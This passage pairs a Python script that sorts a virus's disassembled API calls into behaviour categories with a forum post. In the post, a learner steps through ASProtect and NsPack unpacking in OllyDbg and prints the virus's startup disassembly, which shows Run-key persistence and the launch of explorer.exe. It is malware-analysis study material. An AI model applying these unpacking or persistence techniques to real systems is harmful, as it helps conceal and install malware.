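0040F97F |. E8 404DFFFF call <jmp.&kernel32.DeleteFileA> ; \DeleteFileA
0040F9F5 |. E8 824DFFFF call <jmp.&kernel32.RemoveDirectoryA> ; \RemoveDirectoryA
0040FB66 |. BA 58044100 mov edx, 00410458 ; ASCII "Software\Microsoft\Windows\CurrentVersion\Run"
0040FB6B |. B8 02000080 mov eax, 80000002
0040FBE8 |. E8 974AFFFF call <jmp.&kernel32.CopyFileA> ; \CopyFileA
0040FC6F |. E8 304BFFFF call <jmp.&kernel32.WinExec> ; \WinExec
0040FDD5 |. 68 88044100 push 00410488 ; |Class = "Shell_TrayWnd"
0040FDDA |. E8 E549FFFF call <jmp.&user32.FindWindowA> ; \FindWindowA
0040FE3B |. E8 2449FFFF call <jmp.&kernel32.OpenMutexA> ; \OpenMutexA
0040FF2A |. E8 8D47FFFF call <jmp.&kernel32.CreateThread> ; \CreateThread
0040FF55 |. E8 C248FFFF call <jmp.&user32.SetTimer> ; \SetTimer
"""

# 'call <jmp.&module.Name>' is how OllyDbg shows a thunked import; the
# trailing '; \NameA' comment carries the exact export that was resolved.
CALL_RE = re.compile(
    r"call <jmp\.&(?P<mod>\w+)\.(?P<api>\w+)>(?:\s*;\s*\\(?P<resolved>\w+))?")
# Strings OllyDbg recognised, either 'ASCII "..."' or an argument '= "..."'.
STRING_RE = re.compile(r'(?:ASCII|=)\s*"([^"]*)"')
# Predefined registry root handles (HKEY_* constants).
HIVES = {"80000000": "HKEY_CLASSES_ROOT", "80000001": "HKEY_CURRENT_USER",
         "80000002": "HKEY_LOCAL_MACHINE", "80000003": "HKEY_USERS"}
# Assumption: with the Delphi register convention seen in the listing the
# root key travels in eax right before the registry helper is called.
HIVE_RE = re.compile(r"mov eax, (8000000[0-3])\b")

# Category names are this example's own, not anything from the post.
API_RULES = {
    "file tampering (attributes/delete/rmdir)":
        {"SetFileAttributesA", "DeleteFileA", "RemoveDirectoryA"},
    "self-copy and launch": {"CopyFileA", "WinExec"},
    "mutex gating (single instance)": {"OpenMutexA", "CreateMutexA", "ReleaseMutex"},
    "background threads / timers": {"CreateThread", "SetTimer"},
}


def parse_listing(text):
    """Return (calls, strings, hives), each a list of (address, value)."""
    calls, strings, hives = [], [], []
    for line in text.strip().splitlines():
        fields = line.split(None, 1)
        if not fields:
            continue
        addr = fields[0]
        m = CALL_RE.search(line)
        if m:
            # Prefer the resolved export name; fall back to the thunk label.
            calls.append((addr, m.group("resolved") or m.group("api")))
        for s in STRING_RE.findall(line):
            strings.append((addr, s))
        h = HIVE_RE.search(line)
        if h:
            hives.append((addr, HIVES[h.group(1)]))
    return calls, strings, hives


def api_sequence(text):
    """Imported APIs in address order, the skeleton of what the code does."""
    return [api for _, api in parse_listing(text)[0]]


def triage(text):
    """Map the extracted calls and strings onto behaviour categories."""
    calls, strings, hives = parse_listing(text)
    seen = {api for _, api in calls}
    findings = {}
    for tag, apis in API_RULES.items():
        hit = sorted(seen & apis)
        if hit:
            findings[tag] = hit
    # The Run key is written through a library wrapper (no direct RegSetValue
    # import in the listing), so persistence is detected from the key string.
    run_keys = [s for _, s in strings if re.search(r"currentversion\\run", s, re.I)]
    if run_keys:
        hive = ", ".join(sorted({h for _, h in hives})) or "hive not resolved"
        findings["persistence (Run key)"] = [hive + "\\" + k for k in run_keys]
    # FindWindowA("Shell_TrayWnd") checks that the taskbar (an interactive
    # desktop) exists before the rest of the startup path runs.
    if "FindWindowA" in seen and any(s == "Shell_TrayWnd" for _, s in strings):
        findings["desktop presence check (taskbar window)"] = ["FindWindowA(Shell_TrayWnd)"]
    return findings


if __name__ == "__main__":
    print("API sequence:", " -> ".join(api_sequence(SAMPLE_LISTING)))
    for tag, detail in triage(SAMPLE_LISTING).items():
        print(f"[{tag}] " + "; ".join(detail))
```

Feed it the full listing from the post and the API sequence reproduces the startup path the dump shows: clear old files, write the Run key, copy and launch, then gate on the mutex and start threads and timers.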
谢谢lovelyfrog、sskey、夜凉如水的热心帮助,
因为自己没上网,只能抽机会上网贴一些事先写好的东西,
所以一般就不能回帖感谢诸位了,
连上这次一块谢谢大侠们了,还有看雪这个宝地。
再次感谢诸位了,
接上回
00D8ED08 68 1F8724DD push DD24871F ;靠插件断在这里,只隐藏了一个peb
00D8ED0D 68 2C2A0000 push 2A2C
00D8ED12 68 900A0200 push 20A90
00D8ED17 68 C0200000 push 20C0
00D8ED1C 68 44CC0000 push 0CC44
00D8ED21 68 00F00400 push 4F000
00D8ED26 FF35 D434DC00 push dword ptr ds:[DC34D4]
00D8ED2C E8 23D1FFFF call 00D8BE54
00D8ED31 310424 xor dword ptr ss:[esp], eax
00D8ED34 8B05 D434DC00 mov eax, dword ptr ds:[DC34D4]
00D8ED3A 010424 add dword ptr ss:[esp], eax
00D8ED3D C3 retn ; return
00D8ED3E C3 retn
00DC01D8 68 E1288508 push 88528E1 ; arrive here
00DC01DD 68 E0020000 push 2E0
00DC01E2 68 04590100 push 15904
00DC01E7 68 C4170000 push 17C4
00DC01EC 68 10EA0300 push 3EA10
00DC01F1 68 00F00400 push 4F000
00DC01F6 FF35 D434DC00 push dword ptr ds:[DC34D4]
00DC01FC E8 01000000 call 00DC0202
00DC0201 8183 C404E84A B>add dword ptr ds:[ebx+4AE804C4], E8F>
00DC020B 0100 add dword ptr ds:[eax], eax
00DC020D 0000 add byte ptr ds:[eax], al
00DC020F 8183 C4043104 2>add dword ptr ds:[ebx+43104C4], 1E82>
00DC0219 0000 add byte ptr ds:[eax], al
00DC021B 68 83C4048B push 8B04C483
00DC0220 05 D434DC00 add eax, 0DC34D4
00DC0225 E8 02000000 call 00DC022C
00DC022A E8 6883C404 call 05A08597
00DC022F 010424 add dword ptr ss:[esp], eax
00DC0232 C3 retn ; F4, F8
00DBFADC E8 E7FEFFFF call 00DBF9C8 ; step into
00DBF9C8 53 push ebx ; arrive here
00DBF9C9 56 push esi
00DBF9CA 57 push edi
00DBF9CB 83C4 DC add esp, -24
00DBF9CE A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBF9D3 C600 DF mov byte ptr ds:[eax], 0DF
00DBF9D6 A1 50B6DC00 mov eax, dword ptr ds:[DCB650]
00DBF9DB 894424 14 mov dword ptr ss:[esp+14], eax
00DBF9DF B8 34E8DB00 mov eax, 0DBE834
00DBF9E4 894424 18 mov dword ptr ss:[esp+18], eax
00DBF9E8 BA C8F9DB00 mov edx, 0DBF9C8
00DBF9ED 2BD0 sub edx, eax
00DBF9EF 895424 1C mov dword ptr ss:[esp+1C], edx
00DBF9F3 B8 40E6DB00 mov eax, 0DBE640
00DBF9F8 8B15 F02BDC00 mov edx, dword ptr ds:[DC2BF0]
00DBF9FE 8B12 mov edx, dword ptr ds:[edx]
00DBFA00 2B02 sub eax, dword ptr ds:[edx]
00DBFA02 894424 20 mov dword ptr ss:[esp+20], eax
00DBFA06 EB 06 jmp short 00DBFA0E
00DBFA08 FF25 C3EB01E8 jmp near dword ptr ds:[E801EBC3]
00DBFA0E 68 A7E8DB00 push 0DBE8A7
00DBFA13 58 pop eax
00DBFA14 40 inc eax
00DBFA15 68 1DFADB00 push 0DBFA1D
00DBFA1A 50 push eax
00DBFA1B ^ EB ED jmp short 00DBFA0A
00DBFA1D E8 1EF4FFFF call 00DBEE40
00DBFA22 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA27 8B00 mov eax, dword ptr ds:[eax]
00DBFA29 8B70 1C mov esi, dword ptr ds:[eax+1C]
00DBFA2C A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA31 8B00 mov eax, dword ptr ds:[eax]
00DBFA33 8B38 mov edi, dword ptr ds:[eax]
00DBFA35 A1 F02BDC00 mov eax, dword ptr ds:[DC2BF0]
00DBFA3A 8B00 mov eax, dword ptr ds:[eax]
00DBFA3C 8D58 18 lea ebx, dword ptr ds:[eax+18]
00DBFA3F 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA42 75 20 jnz short 00DBFA64
00DBFA44 83C6 20 add esi, 20
00DBFA47 A1 682ADC00 mov eax, dword ptr ds:[DC2A68]
00DBFA4C 80B8 2D010000 0>cmp byte ptr ds:[eax+12D], 0
00DBFA53 75 0F jnz short 00DBFA64
00DBFA55 B8 1F000000 mov eax, 1F
00DBFA5A E8 652EFCFF call 00D828C4
00DBFA5F C1E0 02 shl eax, 2
00DBFA62 2BF0 sub esi, eax
00DBFA64 E8 33EBFFFF call 00DBE59C
00DBFA69 833B 00 cmp dword ptr ds:[ebx], 0
00DBFA6C 74 05 je short 00DBFA73
00DBFA6E A3 8CB6DC00 mov dword ptr ds:[DCB68C], eax
00DBFA73 8B13 mov edx, dword ptr ds:[ebx]
00DBFA75 891424 mov dword ptr ss:[esp], edx
00DBFA78 897424 08 mov dword ptr ss:[esp+8], esi
00DBFA7C 894424 0C mov dword ptr ss:[esp+C], eax
00DBFA80 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFA85 C600 E1 mov byte ptr ds:[eax], 0E1
00DBFA88 A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFA8D E8 EE5DFFFF call 00DB5880
00DBFA92 A1 88B6DC00 mov eax, dword ptr ds:[DCB688]
00DBFA97 894424 04 mov dword ptr ss:[esp+4], eax
00DBFA9B 897C24 10 mov dword ptr ss:[esp+10], edi
00DBFA9F A1 242BDC00 mov eax, dword ptr ds:[DC2B24]
00DBFAA4 8B00 mov eax, dword ptr ds:[eax]
00DBFAA6 E8 6931FCFF call 00D82C14
00DBFAAB A1 58B6DC00 mov eax, dword ptr ds:[DCB658]
00DBFAB0 E8 5F31FCFF call 00D82C14
00DBFAB5 A1 9C2BDC00 mov eax, dword ptr ds:[DC2B9C]
00DBFABA C600 E3 mov byte ptr ds:[eax], 0E3
00DBFABD 8BD4 mov edx, esp
00DBFABF A1 94B6DC00 mov eax, dword ptr ds:[DCB694]
00DBFAC4 E8 23B9FFFF call 00DBB3EC
00DBFAC9 E8 8E3CFFFF call 00DB375C
00DBFACE E8 61EDFFFF call 00DBE834 ; F4, F8, just following along; I think it said the three calls are close together
00DBE834 /65:EB 01 jmp short 00DBE838 ; once here I saw a block of red; Ctrl+F9 to run until return
00DBE837 |C783 D16A13CD B>mov dword ptr ds:[ebx+CD136AD1], 49F>
00DBE841 0003 add byte ptr ds:[ebx], al
00DBE843 4C dec esp
00DBE844 24 18 and al, 18
00DBE846 B9 46624900 mov ecx, 496246
00DBE84B B9 FE224A00 mov ecx, 4A22FE
00DBE850 8D8C22 00000000 lea ecx, dword ptr ds:[edx]
00DBE857 EB 02 jmp short 00DBE85B
00DBE859 CD20 2BCA85C9 vxdjump C985CA2B
00DBE85F 0F85 E7000000 jnz 00DBE94C
00DBE865 C1DA 13 rcr edx, 13
\\\\\\\\\\\\\\\\\ ..... omitted .....
01F80000 0FB7F7 movzx esi, di ; stopped here
01F80003 66:81D2 BD25 adc dx, 25BD
01F80008 E8 07000000 call 01F80014 ; step into
01F80014 0FB7FF movzx edi, di ; from here on it differs from the tutorial; I tried, and could only step into every call
01F80017 5B pop ebx
01F80018 BF B0ABA72B mov edi, 2BA7ABB0
01F8001D 81C3 31010000 add ebx, 131
01F80023 68 4FCB957B push 7B95CB4F
01F80028 0F8A 02000000 jpe 01F80030
01F8002E 52 push edx
01F8002F 5A pop edx
01F80030 5E pop esi
01F80031 81DE 0CAB9F6B sbb esi, 6B9FAB0C
01F80037 68 6A76D65A push 5AD6766A
01F8003C 66:BE 379E mov si, 9E37
01F80040 5E pop esi
01F80041 B9 0B000000 mov ecx, 0B
01F80046 0F82 05000000 jb 01F80051
01F8004C BF 3CEFE942 mov edi, 42E9EF3C
01F80051 E8 0F000000 call 01F80065 ; step into
01F80065 68 58468310 push 10834658
01F8006A 66:BF 9CBB mov di, 0BB9C
01F8006E 56 push esi
01F8006F 5F pop edi
01F80070 5F pop edi
01F80071 5E pop esi
01F80072 FF33 push dword ptr ds:[ebx]
01F80074 E8 05000000 call 01F8007E ; step into
01F8007E 50 push eax ; arrive here
01F8007F 68 CD126831 push 316812CD
01F80084 5E pop esi
01F80085 5F pop edi
01F80086 5A pop edx
01F80087 58 pop eax
01F80088 66:BF A634 mov di, 34A6
01F8008C 81C6 00BC791E add esi, 1E79BC00
01F80092 81F0 77226445 xor eax, 45642277
01F80098 8BF2 mov esi, edx
01F8009A 81F0 E41E2D6D xor eax, 6D2D1EE4
01F800A0 66:8BF7 mov si, di
01F800A3 51 push ecx
01F800A4 0FBFF9 movsx edi, cx
01F800A7 53 push ebx
01F800A8 5F pop edi
01F800A9 5E pop esi
01F800AA 8BD1 mov edx, ecx
01F800AC 81F0 4DCFF703 xor eax, 3F7CF4D
01F800B2 66:81E6 78F5 and si, 0F578
01F800B7 E9 0B000000 jmp 01F800C7 ; jumps down
01F800C7 8903 mov dword ptr ds:[ebx], eax
01F800C9 BA 66F70029 mov edx, 2900F766
01F800CE 83EB 02 sub ebx, 2
01F800D1 4B dec ebx
01F800D2 4B dec ebx
01F800D3 BE BBAE5C5E mov esi, 5E5CAEBB
01F800D8 66:8BF3 mov si, bx
01F800DB 8BF0 mov esi, eax
01F800DD 49 dec ecx
01F800DE ^ 0F85 8EFFFFFF jnz 01F80072 ; jumps up
01F800E4 53 push ebx ; the above is a loop, set a breakpoint here
01F800E5 E8 0E000000 call 01F800F8 ; F7
01F800F8 81CF 0502666D or edi, 6D660205 ; arrive here
01F800FE E8 10000000 call 01F80113 ; step into
01F80113 5E pop esi ; 01F80103
01F80114 5A pop edx
01F80115 5E pop esi
01F80116 EB 01 jmp short 01F80119 ; jump
01F80119 83CB EF or ebx, FFFFFFEF
01F8011C 035C24 18 add ebx, dword ptr ss:[esp+18]
01F80120 5B pop ebx
01F80121 8D4447 2D lea eax, dword ptr ds:[edi+eax*2+2D]
01F80125 58 pop eax
01F80126 EB 02 jmp short 01F8012A
01F8012A 8D80 9004BE3B lea eax, dword ptr ds:[eax+3BBE0490]
01F80130 03C3 add eax, ebx
01F80132 5C pop esp
01F80133 FFE0 jmp near eax ; calls and jumps all over the place, but luckily it comes out in the end;
Jumped out of ASProtect.
\\\\\\\\\\\\\\\\\\\\\ Jumped into another packer, NsPacK, the first time I have met it; I found an example to use as reference \\\\\
0041A3D3 9C pushfd ; this is it; at first I thought this was the OEP, and even thought that maybe because
0041A3D4 60 pushad ; it's a virus it was a bit odd, since I had assumed unpacking ASProtect requires IAT repair;
0041A3D5 E8 00000000 call 0041A3DA ; I didn't expect that when I dumped it and looked, it was another packer,
0041A3DA 5D pop ebp
0041A3DB 83ED 07 sub ebp, 7
0041A3DE 8D8D A9FCFFFF lea ecx, dword ptr ss:[ebp-357]
0041A3E4 8039 01 cmp byte ptr ds:[ecx], 1
0041A3E7 0F84 42020000 je 0041A62F
0041A3ED C601 01 mov byte ptr ds:[ecx], 1
0041A3F0 8BC5 mov eax, ebp
0041A3F2 2B85 3DFCFFFF sub eax, dword ptr ss:[ebp-3C3]
0041A3F8 8985 3DFCFFFF mov dword ptr ss:[ebp-3C3], eax
0041A3FE 0185 6DFCFFFF add dword ptr ss:[ebp-393], eax
0041A404 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A40A 0106 add dword ptr ds:[esi], eax
0041A40C 55 push ebp
0041A40D 56 push esi
0041A40E 6A 40 push 40
0041A410 68 00100000 push 1000
0041A415 68 00100000 push 1000
0041A41A 6A 00 push 0
0041A41C FF95 D5FCFFFF call near dword ptr ss:[ebp-32B]
0041A422 85C0 test eax, eax
0041A424 0F84 69030000 je 0041A793
0041A42A 8985 65FCFFFF mov dword ptr ss:[ebp-39B], eax
0041A430 E8 00000000 call 0041A435
0041A435 5B pop ebx
0041A436 B9 67030000 mov ecx, 367
0041A43B 03D9 add ebx, ecx
0041A43D 50 push eax
0041A43E 53 push ebx
0041A43F E8 B0020000 call 0041A6F4
0041A444 5E pop esi
0041A445 5D pop ebp
0041A446 8B36 mov esi, dword ptr ds:[esi]
0041A448 8BFD mov edi, ebp
0041A44A 03BD 2DFCFFFF add edi, dword ptr ss:[ebp-3D3]
0041A450 8BDF mov ebx, edi
0041A452 833F 00 cmp dword ptr ds:[edi], 0
0041A455 75 0A jnz short 0041A461
0041A457 83C7 04 add edi, 4
0041A45A B9 00000000 mov ecx, 0
0041A45F EB 16 jmp short 0041A477
0041A461 B9 01000000 mov ecx, 1
0041A466 033B add edi, dword ptr ds:[ebx]
0041A468 83C3 04 add ebx, 4
0041A46B 833B 00 cmp dword ptr ds:[ebx], 0
0041A46E 74 34 je short 0041A4A4
0041A470 0113 add dword ptr ds:[ebx], edx
0041A472 8B33 mov esi, dword ptr ds:[ebx]
0041A474 037B 04 add edi, dword ptr ds:[ebx+4]
0041A477 57 push edi
0041A478 51 push ecx
0041A479 53 push ebx
0041A47A FFB5 D9FCFFFF push dword ptr ss:[ebp-327]
0041A480 FFB5 D5FCFFFF push dword ptr ss:[ebp-32B]
0041A486 8BD6 mov edx, esi
0041A488 8BCF mov ecx, edi
0041A48A 8B85 65FCFFFF mov eax, dword ptr ss:[ebp-39B]
0041A490 05 AA050000 add eax, 5AA
0041A495 FFD0 call near eax
0041A497 5B pop ebx
0041A498 59 pop ecx
0041A499 5F pop edi
0041A49A 83F9 00 cmp ecx, 0
0041A49D 74 05 je short 0041A4A4
0041A49F 83C3 08 add ebx, 8
0041A4A2 ^ EB C7 jmp short 0041A46B
0041A4A4 68 00800000 push 8000
0041A4A9 6A 00 push 0
0041A4AB FFB5 65FCFFFF push dword ptr ss:[ebp-39B]
0041A4B1 FF95 D9FCFFFF call near dword ptr ss:[ebp-327]
0041A4B7 8DB5 6DFCFFFF lea esi, dword ptr ss:[ebp-393]
0041A4BD 8B4E 08 mov ecx, dword ptr ds:[esi+8]
0041A4C0 8D56 10 lea edx, dword ptr ds:[esi+10]
0041A4C3 8B36 mov esi, dword ptr ds:[esi]
0041A4C5 8BFE mov edi, esi
0041A4C7 83F9 00 cmp ecx, 0
0041A4CA 74 3F je short 0041A50B
0041A4CC 8A07 mov al, byte ptr ds:[edi]
0041A4CE 47 inc edi
0041A4CF 2C E8 sub al, 0E8
0041A4D1 3C 01 cmp al, 1
0041A4D3 ^ 77 F7 ja short 0041A4CC
0041A4D5 8B07 mov eax, dword ptr ds:[edi]
0041A4D7 807A 01 00 cmp byte ptr ds:[edx+1], 0
0041A4DB 74 14 je short 0041A4F1
0041A4DD 8A1A mov bl, byte ptr ds:[edx]
0041A4DF 381F cmp byte ptr ds:[edi], bl
0041A4E1 ^ 75 E9 jnz short 0041A4CC
0041A4E3 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4E6 66:C1E8 08 shr ax, 8
0041A4EA C1C0 10 rol eax, 10
0041A4ED 86C4 xchg ah, al
0041A4EF EB 0A jmp short 0041A4FB
0041A4F1 8A5F 04 mov bl, byte ptr ds:[edi+4]
0041A4F4 86C4 xchg ah, al
0041A4F6 C1C0 10 rol eax, 10
0041A4F9 86C4 xchg ah, al
0041A4FB 2BC7 sub eax, edi
0041A4FD 03C6 add eax, esi
0041A4FF 8907 mov dword ptr ds:[edi], eax
0041A501 83C7 05 add edi, 5
0041A504 80EB E8 sub bl, 0E8
0041A507 8BC3 mov eax, ebx
0041A509 ^ E2 C6 loopd short 0041A4D1
0041A50B E8 3A010000 call 0041A64A
0041A510 8D8D 81FCFFFF lea ecx, dword ptr ss:[ebp-37F]
0041A516 8B41 08 mov eax, dword ptr ds:[ecx+8]
0041A519 83F8 00 cmp eax, 0
0041A51C 0F84 81000000 je 0041A5A3
0041A522 8BF2 mov esi, edx
0041A524 2B71 10 sub esi, dword ptr ds:[ecx+10]
0041A527 74 7A je short 0041A5A3
0041A529 8971 10 mov dword ptr ds:[ecx+10], esi
0041A52C 8DB5 B1FCFFFF lea esi, dword ptr ss:[ebp-34F]
0041A532 8B36 mov esi, dword ptr ds:[esi]
0041A534 8D5E FC lea ebx, dword ptr ds:[esi-4]
0041A537 8B01 mov eax, dword ptr ds:[ecx]
0041A539 83F8 01 cmp eax, 1
0041A53C 74 0A je short 0041A548
0041A53E 8BFA mov edi, edx
0041A540 0379 08 add edi, dword ptr ds:[ecx+8]
0041A543 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A546 EB 08 jmp short 0041A550
0041A548 8BFE mov edi, esi
0041A54A 0379 08 add edi, dword ptr ds:[ecx+8]
0041A54D 8B49 10 mov ecx, dword ptr ds:[ecx+10]
0041A550 33C0 xor eax, eax
0041A552 8A07 mov al, byte ptr ds:[edi]
0041A554 47 inc edi
0041A555 0BC0 or eax, eax
0041A557 74 20 je short 0041A579
0041A559 3C EF cmp al, 0EF
0041A55B 77 06 ja short 0041A563
0041A55D 03D8 add ebx, eax
0041A55F 010B add dword ptr ds:[ebx], ecx
0041A561 ^ EB ED jmp short 0041A550
0041A563 24 0F and al, 0F
0041A565 C1E0 10 shl eax, 10
0041A568 66:8B07 mov ax, word ptr ds:[edi]
0041A56B 83C7 02 add edi, 2
0041A56E 0BC0 or eax, eax
0041A570 ^ 75 EB jnz short 0041A55D
0041A572 8B07 mov eax, dword ptr ds:[edi]
0041A574 83C7 04 add edi, 4
0041A577 ^ EB E4 jmp short 0041A55D
0041A579 33DB xor ebx, ebx
0041A57B 87FE xchg esi, edi
0041A57D 8B06 mov eax, dword ptr ds:[esi]
0041A57F 83F8 00 cmp eax, 0
0041A582 74 1F je short 0041A5A3
0041A584 AD lodsd
0041A585 0BC0 or eax, eax
0041A587 74 08 je short 0041A591
0041A589 03D8 add ebx, eax
0041A58B 66:010C1F add word ptr ds:[edi+ebx], cx
0041A58F ^ EB F3 jmp short 0041A584
0041A591 33DB xor ebx, ebx
0041A593 C1E9 10 shr ecx, 10
0041A596 AD lodsd
0041A597 0BC0 or eax, eax
0041A599 74 08 je short 0041A5A3
0041A59B 03D8 add ebx, eax
0041A59D 66:010C1F add word ptr ds:[edi+ebx], cx
0041A5A1 ^ EB F3 jmp short 0041A596
0041A5A3 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A5A9 8B16 mov edx, dword ptr ds:[esi]
0041A5AB 8DB5 99FCFFFF lea esi, dword ptr ss:[ebp-367]
0041A5B1 8A06 mov al, byte ptr ds:[esi]
0041A5B3 3C 01 cmp al, 1
0041A5B5 75 3F jnz short 0041A5F6
0041A5B7 0356 04 add edx, dword ptr ds:[esi+4]
0041A5BA 56 push esi
0041A5BB 52 push edx
0041A5BC 56 push esi
0041A5BD 6A 04 push 4
0041A5BF 68 00010000 push 100
0041A5C4 52 push edx
0041A5C5 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5CB 5F pop edi
0041A5CC 5E pop esi
0041A5CD 83F8 01 cmp eax, 1
0041A5D0 0F85 BD010000 jnz 0041A793
0041A5D6 83C6 08 add esi, 8
0041A5D9 B9 08000000 mov ecx, 8
0041A5DE F3:A4 rep movsb
0041A5E0 83EE 0C sub esi, 0C
0041A5E3 83EF 08 sub edi, 8
0041A5E6 56 push esi
0041A5E7 FF76 FC push dword ptr ds:[esi-4]
0041A5EA 68 00010000 push 100
0041A5EF 57 push edi
0041A5F0 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A5F6 55 push ebp
0041A5F7 5B pop ebx
0041A5F8 81EB 15000000 sub ebx, 15
0041A5FE 33C9 xor ecx, ecx
0041A600 8A0B mov cl, byte ptr ds:[ebx]
0041A602 80F9 00 cmp cl, 0
0041A605 74 28 je short 0041A62F
0041A607 43 inc ebx
0041A608 8DB5 3DFCFFFF lea esi, dword ptr ss:[ebp-3C3]
0041A60E 8B16 mov edx, dword ptr ds:[esi]
0041A610 56 push esi
0041A611 51 push ecx
0041A612 53 push ebx
0041A613 52 push edx
0041A614 56 push esi
0041A615 FF33 push dword ptr ds:[ebx]
0041A617 FF73 04 push dword ptr ds:[ebx+4]
0041A61A 8B43 08 mov eax, dword ptr ds:[ebx+8]
0041A61D 03C2 add eax, edx
0041A61F 50 push eax
0041A620 FF95 D1FCFFFF call near dword ptr ss:[ebp-32F]
0041A626 5A pop edx
0041A627 5B pop ebx
0041A628 59 pop ecx
0041A629 5E pop esi
0041A62A 83C3 0C add ebx, 0C
0041A62D ^ E2 E1 loopd short 0041A610
0041A62F B8 00000000 mov eax, 0
0041A634 83F8 00 cmp eax, 0
0041A637 74 0A je short 0041A643
0041A639 61 popad
0041A63A 9D popfd
0041A63B B8 01000000 mov eax, 1
0041A640 C2 0C00 retn 0C
0041A643 61 popad
0041A644 9D popfd
0041A645 - E9 DE4CFFFF jmp 0040F328
; The second packer isn't like the reference example: just F8 all the way and it jumps to the OEP.
I dumped this one directly too; I didn't dare run it, went straight into OllyDbg, so I don't know whether it needs repair either.
But looking at the program it seems not to.
\\\\\\\\\\\\\\\\\\\\\\\ After all that hard work I finally found it; I really want to say: you were hard to find, OEP. \\\\\\\\
Below is the virus's own code; I'm posting it first to show it, I haven't started tracing it yet. Today I also discovered the benefit of a virtual machine: when I don't want to keep tracing, I can save the current state.
.................................
PEiD identifies it as Delphi.
0040F328 >/$ 55 push ebp
0040F329 |. 8BEC mov ebp, esp
0040F32B |. B9 32000000 mov ecx, 32
0040F330 |> 6A 00 /push 0
0040F332 |. 6A 00 |push 0
0040F334 |. 49 |dec ecx
0040F335 |.^ 75 F9 \jnz short 0040F330
0040F337 |. 51 push ecx
0040F338 |. 53 push ebx
0040F339 |. 56 push esi
0040F33A |. 57 push edi
0040F33B |. B8 C0F24000 mov eax, 0040F2C0
0040F340 |. E8 1352FFFF call 00404558
0040F345 |. 8B3D 58144100 mov edi, dword ptr ds:[411458] ; 1.004113D8
0040F34B |. 33C0 xor eax, eax
0040F34D |. 55 push ebp
0040F34E |. 68 1E034100 push 0041031E
0040F353 |. 64:FF30 push dword ptr fs:[eax]
0040F356 |. 64:8920 mov dword ptr fs:[eax], esp
0040F359 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F35E |. BA 04010000 mov edx, 104
0040F363 |. E8 584CFFFF call 00403FC0
0040F368 |. 68 04010000 push 104
0040F36D |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F372 |. 8B00 mov eax, dword ptr ds:[eax]
0040F374 |. E8 1F4BFFFF call 00403E98
0040F379 |. 50 push eax ; |PathBuffer
0040F37A |. A1 50264100 mov eax, dword ptr ds:[412650] ; |
0040F37F |. 50 push eax ; |hModule => NULL
0040F380 |. E8 9753FFFF call <jmp.&kernel32.GetModuleFileName>; \GetModuleFileNameA
0040F385 |. 8BD0 mov edx, eax
0040F387 |. A1 34154100 mov eax, dword ptr ds:[411534]
0040F38C |. E8 2F4CFFFF call 00403FC0
0040F391 |. E8 B28FFFFF call 00408348
0040F396 |. BE 17000000 mov esi, 17
0040F39B |. 8B1D 84144100 mov ebx, dword ptr ds:[411484] ; 1.004110CC
0040F3A1 |> A1 58154100 /mov eax, dword ptr ds:[411558]
0040F3A6 |. 8B13 |mov edx, dword ptr ds:[ebx]
0040F3A8 |. E8 BB47FFFF |call 00403B68
0040F3AD |. 8D55 EC |lea edx, dword ptr ss:[ebp-14]
0040F3B0 |. A1 34154100 |mov eax, dword ptr ds:[411534]
0040F3B5 |. 8B00 |mov eax, dword ptr ds:[eax]
0040F3B7 |. E8 4470FFFF |call 00406400
0040F3BC |. 8B45 EC |mov eax, dword ptr ss:[ebp-14]
0040F3BF |. 50 |push eax
0040F3C0 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F3C5 |. FF30 |push dword ptr ds:[eax]
0040F3C7 |. A1 50154100 |mov eax, dword ptr ds:[411550]
0040F3CC |. FF30 |push dword ptr ds:[eax]
0040F3CE |. FF37 |push dword ptr ds:[edi]
0040F3D0 |. 8D45 E4 |lea eax, dword ptr ss:[ebp-1C]
0040F3D3 |. BA 03000000 |mov edx, 3
0040F3D8 |. E8 7B49FFFF |call 00403D58
0040F3DD |. 8B45 E4 |mov eax, dword ptr ss:[ebp-1C]
0040F3E0 |. 8D55 E8 |lea edx, dword ptr ss:[ebp-18]
0040F3E3 |. E8 1870FFFF |call 00406400
0040F3E8 |. 8B55 E8 |mov edx, dword ptr ss:[ebp-18]
0040F3EB |. 58 |pop eax
0040F3EC |. E8 F349FFFF |call 00403DE4
0040F3F1 |. 0F85 A5010000 |jnz 0040F59C
0040F3F7 |. 6A 01 |push 1
0040F3F9 |. 8D45 DC |lea eax, dword ptr ss:[ebp-24]
0040F3FC |. E8 D384FFFF |call 004078D4
0040F401 |. FF75 DC |push dword ptr ss:[ebp-24]
0040F404 |. 68 38034100 |push 00410338 ; ASCII "explorer.exe "
0040F409 |. A1 58154100 |mov eax, dword ptr ds:[411558]
0040F40E |. FF30 |push dword ptr ds:[eax]
0040F410 |. 8D45 E0 |lea eax, dword ptr ss:[ebp-20]
0040F413 |. BA 03000000 |mov edx, 3
0040F418 |. E8 3B49FFFF |call 00403D58
0040F41D |. 8B45 E0 |mov eax, dword ptr ss:[ebp-20]
0040F420 |. E8 734AFFFF |call 00403E98
0040F425 |. 50 |push eax ; |CmdLine
0040F426 |. E8 7953FFFF |call <jmp.&kernel32.WinExec> ; \WinExec
0040F42B |. 6A 00 |push 0 ; /lParam = 0
0040F42D |. 6A 00 |push 0 ; |wParam = 0
0040F42F |. 6A 10 |push 10 ; |Message = WM_CLOSE
0040F431 |. 68 48034100 |push 00410348 ; |/Title = "我的电脑"
0040F436 |. 6A 00 |push 0 ; ||Class = 0
0040F438 |. E8 8753FFFF |call <jmp.&user32.FindWindowA> ; |\FindWindowA
0040F43D |. 50 |push eax ; |hWnd
0040F43E |. E8 C953FFFF |call <jmp.&user32.PostMessageA> ; \PostMessageA
0040F443 |. 6A 00 |push 0 ; /lParam = 0
